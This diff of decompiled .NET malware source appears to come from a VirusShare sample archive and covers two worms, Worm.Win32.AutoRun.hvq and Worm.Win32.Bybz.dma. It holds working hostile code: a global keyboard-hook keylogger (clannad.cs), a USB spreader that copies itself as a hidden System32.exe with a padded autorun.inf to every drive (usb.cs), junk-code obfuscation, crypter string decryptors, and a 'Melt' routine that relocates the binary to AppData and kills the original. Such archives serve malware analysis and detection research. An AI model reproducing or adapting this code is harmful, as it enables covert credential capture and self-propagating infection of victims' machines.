</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/Worm.Win32.AutoRun.hvq.csproj
+58
View File
@@ -0,0 +1,58 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{6464FEA3-A758-4AAC-847A-268A7631495A}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Stub</AssemblyName>
<ApplicationVersion>2.0.2.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="clannad.cs" />
<Compile Include="F7h5o2wX4skMmN8HU.cs" />
<Compile Include="p93tq7zN7k4Aua4hyWC673C50x7.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Pass.cs" />
<Compile Include="usb.cs" />
<Compile Include="ResourceReader.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="RandomPassword.resx" />
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/Worm.Win32.AutoRun.hvq.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Stub", "Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.csproj", "{6464FEA3-A758-4AAC-847A-268A7631495A}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6464FEA3-A758-4AAC-847A-268A7631495A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{6464FEA3-A758-4AAC-847A-268A7631495A}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6464FEA3-A758-4AAC-847A-268A7631495A}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6464FEA3-A758-4AAC-847A-268A7631495A}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/clannad.cs
+216
View File
@@ -0,0 +1,216 @@
// Decompiled with JetBrains decompiler
// Type: clannad
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Windows.Forms;
public class clannad
{
private static int Key;
private static clannad.KDel KHD;
[DebuggerNonUserCode]
public clannad()
{
}
[DllImport("user32", EntryPoint = "SetWindowsHookExA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SetWindowsHookEx(
int Hook,
clannad.KDel KeyDelegate,
int HMod,
int ThreadId);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int CallNextHookEx(
int Hook,
int nCode,
int wParam,
ref clannad.KeyStructure lParam);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int UnhookWindowsHookEx(int Hook);
public static event clannad.DownEventHandler Down;
public static event clannad.UpEventHandler Up;
public void CreateHook()
{
clannad.KHD = new clannad.KDel(this.Proc);
clannad.Key = clannad.SetWindowsHookEx(13, clannad.KHD, Marshal.GetHINSTANCE(Assembly.GetExecutingAssembly().GetModules()[0]).ToInt32(), 0);
}
private int Proc(int Code, int wParam, ref clannad.KeyStructure lParam)
{
if (Code == 0)
{
switch (wParam)
{
case 256:
case 260:
clannad.DownEventHandler downEvent = clannad.DownEvent;
if (downEvent != null)
{
downEvent(this.Feed((Keys) lParam.Code));
break;
}
break;
case 257:
case 261:
clannad.UpEventHandler upEvent = clannad.UpEvent;
if (upEvent != null)
{
upEvent(this.Feed((Keys) lParam.Code));
break;
}
break;
}
}
return clannad.CallNextHookEx(clannad.Key, Code, wParam, ref lParam);
}
public void DiposeHook()
{
clannad.UnhookWindowsHookEx(clannad.Key);
// ISSUE: explicit finalizer call
this.Finalize();
}
private string Feed(Keys e)
{
Keys keys = e;
if (keys >= Keys.A && keys <= Keys.Z)
return Control.IsKeyLocked(Keys.Capital) | (Control.ModifierKeys & Keys.Shift) != Keys.None ? e.ToString() : e.ToString().ToLower();
if (keys >= Keys.D0 && keys <= Keys.D9)
{
if ((Control.ModifierKeys & Keys.Shift) == Keys.None)
return e.ToString().Replace("D", (string) null);
string Left = e.ToString();
if (Operators.CompareString(Left, "D1", false) == 0)
return "!";
if (Operators.CompareString(Left, "D2", false) == 0)
return "@";
if (Operators.CompareString(Left, "D3", false) == 0)
return "#";
if (Operators.CompareString(Left, "D4", false) == 0)
return "$";
if (Operators.CompareString(Left, "D5", false) == 0)
return "%";
if (Operators.CompareString(Left, "D6", false) == 0)
return "^";
if (Operators.CompareString(Left, "D7", false) == 0)
return "&";
if (Operators.CompareString(Left, "D8", false) == 0)
return "*";
if (Operators.CompareString(Left, "D9", false) == 0)
return "(";
if (Operators.CompareString(Left, "D0", false) == 0)
return ")";
}
else
{
if (keys >= Keys.NumPad0 && keys <= Keys.NumPad9)
return e.ToString().Replace("NumPad", (string) null);
if (keys >= Keys.Multiply && keys <= Keys.Divide)
{
string Left = e.ToString();
if (Operators.CompareString(Left, "Divide", false) == 0)
return "/";
if (Operators.CompareString(Left, "Multiply", false) == 0)
return "*";
if (Operators.CompareString(Left, "Subtract", false) == 0)
return "-";
if (Operators.CompareString(Left, "Add", false) == 0)
return "+";
if (Operators.CompareString(Left, "Decimal", false) == 0)
return ".";
}
else
{
if (keys == Keys.Space)
return " ";
if (keys >= Keys.OemSemicolon && keys <= Keys.OemQuotes)
{
if ((Control.ModifierKeys & Keys.Shift) != Keys.None)
{
string Left = e.ToString();
if (Operators.CompareString(Left, "OemMinus", false) == 0)
return "_";
if (Operators.CompareString(Left, "Oemplus", false) == 0)
return "+";
if (Operators.CompareString(Left, "OemOpenBrackets", false) == 0)
return "{";
if (Operators.CompareString(Left, "Oem6", false) == 0)
return "}";
if (Operators.CompareString(Left, "Oem5", false) == 0)
return "|";
if (Operators.CompareString(Left, "Oem1", false) == 0)
return ":";
if (Operators.CompareString(Left, "Oem7", false) == 0)
return "\"";
if (Operators.CompareString(Left, "Oemcomma", false) == 0)
return "<";
if (Operators.CompareString(Left, "OemPeriod", false) == 0)
return ">";
if (Operators.CompareString(Left, "OemQuestion", false) == 0)
return "?";
if (Operators.CompareString(Left, "Oemtilde", false) == 0)
return "~";
}
else
{
string Left = e.ToString();
if (Operators.CompareString(Left, "OemMinus", false) == 0)
return "-";
if (Operators.CompareString(Left, "Oemplus", false) == 0)
return "=";
if (Operators.CompareString(Left, "OemOpenBrackets", false) == 0)
return "[";
if (Operators.CompareString(Left, "Oem6", false) == 0)
return "]";
if (Operators.CompareString(Left, "Oem5", false) == 0)
return "\\";
if (Operators.CompareString(Left, "Oem1", false) == 0)
return ";";
if (Operators.CompareString(Left, "Oem7", false) == 0)
return "'";
if (Operators.CompareString(Left, "Oemcomma", false) == 0)
return ",";
if (Operators.CompareString(Left, "OemPeriod", false) == 0)
return ".";
if (Operators.CompareString(Left, "OemQuestion", false) == 0)
return "/";
if (Operators.CompareString(Left, "Oemtilde", false) == 0)
return "`";
}
}
else
return keys == Keys.Return ? Environment.NewLine : "<" + e.ToString() + ">";
}
}
return (string) null;
}
private delegate int KDel(int nCode, int wParam, ref clannad.KeyStructure lParam);
public delegate void DownEventHandler(string Key);
public delegate void UpEventHandler(string Key);
private struct KeyStructure
{
public int Code;
public int ScanCode;
public int Flags;
public int Time;
public int ExtraInfo;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/p93tq7zN7k4Aua4hyWC673C50x7.cs
+160
View File
@@ -0,0 +1,160 @@
// Decompiled with JetBrains decompiler
// Type: p93tq7zN7k4Aua4hyWC673C50x7
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Windows.Forms;
public class p93tq7zN7k4Aua4hyWC673C50x7
{
[DebuggerNonUserCode]
public p93tq7zN7k4Aua4hyWC673C50x7()
{
}
public void wy50So2xTbr40ZLr7()
{
bool flag = false;
int num1 = 11462331;
while (true)
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
int num2 = 67243;
do
{
flag = false;
checked { ++num2; }
}
while (num2 <= 721895);
while (true)
{
num1 = 42292;
flag = true;
}
}
int num3 = (int) Interaction.MsgBox((object) "E5Cl8PTo62aLR2Z2wy");
}
}
public object GqKW6sUeuYVEreQ3JVB4LVBCvCP4()
{
string str = "y\u008F%iˆ4yd8";
Decimal num1 = 875974655M;
if (478014171 <= 1906334)
{
num1 = 7M;
while (true)
str = "X98Z7boNY0sBWfBxsmiSj14U9jbI6ux8QsTZ1f0X6Cekc73na24e4lwusRwCFBJL17ZHCEx7yaQ576pKD3Sku5ckHcGCHIL394P8Ym36OcBy5Tif2pBRp06XKMVXaqzY";
}
else
{
double num2 = 38.0;
double num3 = 46358.0;
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
str = "OYQICCsL6169g67wX8YSJZt6e";
num2 = 0.0;
num3 = 715.0;
while (true)
{
int num4 = (int) Interaction.MsgBox((object) "\u0090~6OGFbW[V)}tb#>[Š`5#K€J$j\u0081F€^ŽGClDlbnr>iVoi~@aa?iV_M{{}*%Cnt1m-jZ'>Jn\u007F7B__o7^v(?'7'O\u008DZ„Za]K#]X{v[4xZC‡\u008DjG*;;-…Y_fT)Vƒqo6v{1S3x'woJaŽ2<P'>hLo$~P(NE†}WxD_+|63E4W46/a$YŠ9Si€t`I,-hvolQ%…");
}
}
}
public void Bf5DM2oceb1()
{
try
{
}
catch (Exception ex1)
{
ProjectData.SetProjectError(ex1);
try
{
}
catch (Exception ex2)
{
ProjectData.SetProjectError(ex2);
int num1 = (int) MessageBox.Show("Ce\u007FAh0‰E#\u008F\u008D‰q@…xq,B,N/p+v-ƒ#\u007FŠY€‰yU#tsy1T.8tHv.YUmT@]B4ˆt][@†X,U-’Š}$\u0090F1.\u008D XINIt]J<%_LVA. 5>„+\u008FvfH~CjQo./OH3OJ/1^I.PafT\\t#{'@‘‘uv%]P…‹_‰P\u0090-.");
try
{
}
catch (Exception ex3)
{
ProjectData.SetProjectError(ex3);
try
{
}
catch (Exception ex4)
{
ProjectData.SetProjectError(ex4);
ProjectData.ClearProjectError();
}
ProjectData.ClearProjectError();
}
int num2 = (int) MessageBox.Show("0V†/\u008FSZ.< Lf.g!#OC./=8Qy<ck\u007FNj\u008DCouEŒj3}U>Zm+ŽWH0AjSU†>UHsƒZVOeul}?qV");
int num3 = 909204125;
while (num3 <= 65725642)
checked { ++num3; }
try
{
}
catch (Exception ex5)
{
ProjectData.SetProjectError(ex5);
ProjectData.ClearProjectError();
}
ProjectData.ClearProjectError();
}
while (true)
;
}
int num4 = 163;
double num5 = 168.0;
double num6 = 0.0;
num6 = 509720027.0;
num4 = 40606;
int num7 = 11;
while (num7 <= 3)
{
int num8 = 64304680;
while (num8 <= 849100)
checked { ++num8; }
checked { ++num7; }
}
int num9 = 187775;
do
{
int num10 = (int) MessageBox.Show("yvW!\u008FfF‡.PJ(Œ\u008Dqz\u008F>ƒ]b…j5U}€- 36„XI.t„‹wK}>@WƒLiE\u007Fpjx+'†+B^2y9‡Ž9Ybc~\u0090ˆ$ZWrDe3D(}6z3U^,LA:hbLdedJD=J}O~G‰l0@KvA\u0090UHbQsYnL5AcGEjˆ….Œ@");
int num11 = 4;
do
{
num5 = 77.0;
checked { ++num11; }
}
while (num11 <= 32);
checked { ++num9; }
}
while (num9 <= 896617);
num4 = 2;
int num12 = (int) MessageBox.Show("b'\u007F€EqD)Tq‡‘oF9P‡WU-[|m‡rs~>Lu*bK{[mV?‡ClXV-t~m!\u007F L2&>1Œe\u00903%orgDe†~^\u008Dgc1SH_2‡&\u007F=`tpO[u<[\\l‰0f|vYO9y3U„L|!O#Šdzq‰F{.‘‰ˆ)1a#QŽl!\u007F9b&un@kznG‡N,qD‰tŽ |~mxcZ/geRSP/b}H^$#in Si!Y\u0090S<,ol8 ^}U;_k&H;");
int num13 = (int) Interaction.MsgBox((object) "†9MVqXXAiŽhPA…TKX3QEŠqh'dvI3nL\u008Dƒ5c)[‰hs9ŽSXŠ‚R-fŠe!A>aBo€iPs/.Žbm`+BJƒa]A5JW8q81iv;(Jkdg@Mm@7 *\u007FX‰<AG};'#W )6}V.P?)L†…7\u008FV!\u00905@F@+]BU‰}\u007FZ3$");
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/usb.cs
+67
View File
@@ -0,0 +1,67 @@
// Decompiled with JetBrains decompiler
// Type: usb
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic.CompilerServices;
using My;
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
[StandardModule]
internal sealed class usb
{
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern void Sleep(long dwMilliseconds);
public static void Usb1()
{
int num;
do
{
checked { ++num; }
try
{
string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
string[] logicalDrives = Directory.GetLogicalDrives();
int index = 0;
while (index < logicalDrives.Length)
{
string str = logicalDrives[index];
if (!File.Exists(str + "System32.exe"))
File.Copy(Assembly.GetExecutingAssembly().Location, str + "System32.exe");
StreamWriter streamWriter = new StreamWriter(str + "autorun.inf");
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine("[autorun];" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine("open=System32.exe;" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine("shellexecute=System32.exe;" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine("action=Open folder to view files;" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine(";" + Pass.RandomPassword.Generate(200, 400));
streamWriter.WriteLine("icon=%SystemRoot%\\system32\\SHELL32.dll,4;" + Pass.RandomPassword.Generate(200, 400));
streamWriter.Close();
File.SetAttributes(str + "autorun.inf", FileAttributes.Hidden);
File.SetAttributes(str + "System32.exe", FileAttributes.Hidden);
checked { ++index; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
usb.Sleep(120000L);
}
while (num != 10);
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyProduct("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyTitle("")]
[assembly: Guid("85d65575-26be-49e2-86e8-104e08e64ea9")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/Form1.cs
+1864
View File
File diff suppressed because it is too large Load Diff
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/JHSAKDJHkjhakJHkjhUyiuYiuyIUyiUYiuyIuyiuYYrYTY.cs
+124
View File
@@ -0,0 +1,124 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.JHSAKDJHkjhakJHkjhUyiuYiuyIUyiUYiuyIuyiuYYrYTY
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace ajhfsdlhjasnagfgewfwsg
{
public class JHSAKDJHkjhakJHkjhUyiuYiuyIUyiUYiuyIuyiuYYrYTY
{
[DebuggerNonUserCode]
public JHSAKDJHkjhakJHkjhUyiuYiuyIUyiUYiuyIuyiuYYrYTY()
{
}
public static byte[] dsfkjhxcivudsoifuoixuvoiusaduoasdzxc(byte[] bytes, byte[] key)
{
byte[] numArray1 = new byte[256];
int num1 = checked (numArray1.Length - 1);
int index1 = 0;
while (index1 <= num1)
{
numArray1[index1] = checked ((byte) index1);
checked { ++index1; }
}
int num2 = checked (numArray1.Length - 1);
int index2 = 0;
while (index2 <= num2)
{
int index3 = checked (index3 + (int) key[unchecked (index2 % key.Length)] + (int) numArray1[index2]) & (int) byte.MaxValue;
byte num3 = numArray1[index2];
numArray1[index2] = numArray1[index3];
numArray1[index3] = num3;
checked { ++index2; }
}
int index4 = 0;
int index5 = 0;
byte[] numArray2 = new byte[checked (bytes.Length - 1 + 1)];
int num4 = checked (bytes.Length - 1);
int index6 = 0;
while (index6 <= num4)
{
index4 = checked (index4 + 1) & (int) byte.MaxValue;
index5 = checked (index5 + (int) numArray1[index4]) & (int) byte.MaxValue;
byte num5 = numArray1[index4];
numArray1[index4] = numArray1[index5];
numArray1[index5] = num5;
numArray2[index6] = (byte) ((int) numArray1[checked ((int) numArray1[index4] + (int) numArray1[index5]) & (int) byte.MaxValue] ^ (int) bytes[index6]);
checked { ++index6; }
}
return numArray2;
}
public static string asioduzxoicuoisaudoiasudoixzc(string b, string c, bool d)
{
byte[] inputBuffer = Convert.FromBase64String(b);
byte[] numArray = !d ? Encoding.UTF8.GetBytes(c) : new MD5CryptoServiceProvider().ComputeHash(Encoding.UTF8.GetBytes(c));
TripleDESCryptoServiceProvider cryptoServiceProvider = new TripleDESCryptoServiceProvider();
cryptoServiceProvider.Key = numArray;
cryptoServiceProvider.Mode = CipherMode.ECB;
cryptoServiceProvider.Padding = PaddingMode.PKCS7;
return Encoding.UTF8.GetString(cryptoServiceProvider.CreateDecryptor().TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
public static string xJHSAKDJHkjhakJHkjhUyiuYiuyIUyiUYiuyIuyiuYYrYTY(
string CodeKey,
string DataIn)
{
string str = "";
long num1 = checked ((long) Math.Round(unchecked ((double) Strings.Len(DataIn) / 2.0)));
long num2 = 1;
while (num2 <= num1)
{
int num3 = checked ((int) Math.Round(Conversion.Val("&H" + Strings.Mid(DataIn, (int) (2L * num2 - 1L), 2))));
int num4 = Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (num2 % (long) Strings.Len(CodeKey)) + 1L)), 1));
str += Conversions.ToString(Strings.Chr(num3 ^ num4));
checked { ++num2; }
}
return str;
}
public static object Rijndael(string Decrypt, string Key)
{
RijndaelManaged rijndaelManaged = new RijndaelManaged();
byte[] salt = new byte[8]
{
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5,
(byte) 6,
(byte) 7,
(byte) 8
};
Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(Key, salt);
rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.Key.Length);
rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.IV.Length);
MemoryStream memoryStream = new MemoryStream();
CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged.CreateDecryptor(), CryptoStreamMode.Write);
try
{
byte[] buffer = Convert.FromBase64String(Decrypt);
cryptoStream.Write(buffer, 0, buffer.Length);
cryptoStream.Close();
Decrypt = Encoding.UTF8.GetString(memoryStream.ToArray());
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
return (object) Decrypt;
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/Melt.cs
+39
View File
@@ -0,0 +1,39 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.Melt
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Windows.Forms;
namespace ajhfsdlhjasnagfgewfwsg
{
[StandardModule]
internal sealed class Melt
{
public static void Melt(string F)
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
if (Operators.CompareString(Application.StartupPath, folderPath, false) != 0)
{
FileSystem.FileCopy(Application.ExecutablePath, folderPath + "\\" + F);
Interaction.Shell(folderPath + "\\" + F + " " + Application.ExecutablePath);
ProjectData.EndApp();
}
else
{
Process[] processesByName = Process.GetProcessesByName(Interaction.Command());
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
}
}
}
}
